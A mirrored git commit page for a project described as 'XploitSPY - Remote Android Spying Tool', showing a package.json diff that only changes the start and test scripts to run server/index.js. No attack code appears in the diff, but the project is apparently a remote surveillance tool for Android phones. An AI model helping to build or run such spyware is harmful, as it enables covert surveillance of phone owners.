mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-12-28 00:25:30 +08:00
fixed bug
This commit is contained in:
parent
5257f9a0b7
commit
9f1c906998
@ -4,8 +4,8 @@
|
||||
"description": "XploitSPY - Remote Android Spying Tool",
|
||||
"main": "index.js",
|
||||
"scripts": {
|
||||
"start": "node index.js",
|
||||
"test": "node index.js"
|
||||
"start": "node server/index.js",
|
||||
"test": "node server/index.js"
|
||||
},
|
||||
"author": "XploitWizer",
|
||||
"license": "ISC",
|
||||
|
Loading…
Reference in New Issue
Block a user